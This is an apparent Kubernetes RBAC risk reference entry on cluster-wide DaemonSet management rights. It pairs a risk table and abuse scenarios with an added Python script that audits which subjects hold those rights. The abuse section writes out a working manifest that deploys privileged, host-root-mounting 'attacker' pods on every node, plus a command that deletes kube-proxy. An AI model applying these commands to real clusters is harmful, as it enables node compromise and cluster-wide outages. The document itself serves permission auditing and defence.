Manage DaemonSets cluster-wide (runs on all nodes, high impact)
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1035 |
| Name | Manage DaemonSets cluster-wide (runs on all nodes, high impact) |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | apps |
| Resources | daemonsets |
| Verbs | create, update, patch, delete |
| Tags | NodeAccess Persistence PrivilegeEscalation Tampering WorkloadLifecycle |
Description
Permits creating, updating, or deleting DaemonSets across the cluster. DaemonSets ensure a pod runs on all (or selected) nodes. This is highly critical as it allows deploying privileged pods directly onto every node, leading to widespread node compromise, privilege escalation, and persistent access.
Abuse Scenarios
- Create a new DaemonSet that deploys a privileged pod on every node.

```shell
kubectl create -n <namespace> -f - <<EOF
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: privileged-daemonset
spec:
  selector:
    matchLabels:
      app: privileged-ds
  template:
    metadata:
      labels:
        app: privileged-ds
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: attacker
        image: busybox
        command: ["/bin/sh", "-c", "sleep infinity"]
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: host-root
      volumes:
      - name: host-root
        hostPath:
          path: /
EOF
# Example: kubectl create -n kube-system -f - <<EOF ... EOF
```
- Delete a critical DaemonSet, disrupting cluster-wide services.

```shell
kubectl delete daemonset <daemonset-name> -n <namespace>
# Example: kubectl delete daemonset kube-proxy -n kube-system
```
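To find out which subjects actually hold the cluster-wide `apps`/`daemonsets` write verbs listed in the Overview, the following added Python audit (not from the original page or any project) walks ClusterRole and ClusterRoleBinding objects in the shape `kubectl get clusterroles,clusterrolebindings -o json` returns. The role, binding and subject names in it are constructed samples, and wildcard (`*`) entries are treated as matches so over-broad roles are flagged too.

```python
"""Audit RBAC for cluster-wide DaemonSet management rights (constructed example).
The dicts below mimic `kubectl get clusterroles,clusterrolebindings -o json`
output; they are not from a real cluster. Wildcards ("*") count as matches."""

RISKY_VERBS = {"create", "update", "patch", "delete"}

def rule_grants_daemonset_write(rule):
    """True if one PolicyRule grants any risky verb on apps/daemonsets."""
    groups, resources = set(rule.get("apiGroups", [])), set(rule.get("resources", []))
    verbs = set(rule.get("verbs", []))
    return (bool({"*", "apps"} & groups)
            and bool({"*", "daemonsets"} & resources)
            and bool(({"*"} | RISKY_VERBS) & verbs))

def daemonset_admin_subjects(cluster_roles, cluster_role_bindings):
    """Return sorted (Kind/name, clusterrole) pairs that can manage DaemonSets
    cluster-wide. Only ClusterRoleBindings count: a RoleBinding to the same
    ClusterRole confines the grant to a single namespace."""
    risky = {cr["metadata"]["name"] for cr in cluster_roles
             if any(rule_grants_daemonset_write(r) for r in cr.get("rules", []))}
    found = []
    for crb in cluster_role_bindings:
        ref = crb["roleRef"]
        if ref["kind"] == "ClusterRole" and ref["name"] in risky:
            found += [(f'{s["kind"]}/{s["name"]}', ref["name"])
                      for s in crb.get("subjects", [])]
    return sorted(found)

# Constructed sample objects (names are placeholders, not from a real cluster).
SAMPLE_CLUSTER_ROLES = [
    {"metadata": {"name": "ds-admin"}, "rules": [{"apiGroups": ["apps"],
     "resources": ["daemonsets"], "verbs": ["create", "update", "patch", "delete"]}]},
    {"metadata": {"name": "ds-viewer"}, "rules": [{"apiGroups": ["apps"],
     "resources": ["daemonsets"], "verbs": ["get", "list", "watch"]}]},
    {"metadata": {"name": "wildcard-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
]
SAMPLE_BINDINGS = [
    {"roleRef": {"kind": "ClusterRole", "name": "ds-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "ci-deployer"}]},
    {"roleRef": {"kind": "ClusterRole", "name": "ds-viewer"},
     "subjects": [{"kind": "Group", "name": "readers"}]},
    {"roleRef": {"kind": "ClusterRole", "name": "wildcard-admin"},
     "subjects": [{"kind": "User", "name": "alice"}]},
]

if __name__ == "__main__":
    for subject, role in daemonset_admin_subjects(SAMPLE_CLUSTER_ROLES, SAMPLE_BINDINGS):
        print(f"{subject} can manage DaemonSets cluster-wide via ClusterRole/{role}")
```

Every subject reported here should be reviewed against the Risk Level above; read-only holders (`get`, `list`, `watch`) are deliberately left out of the findings.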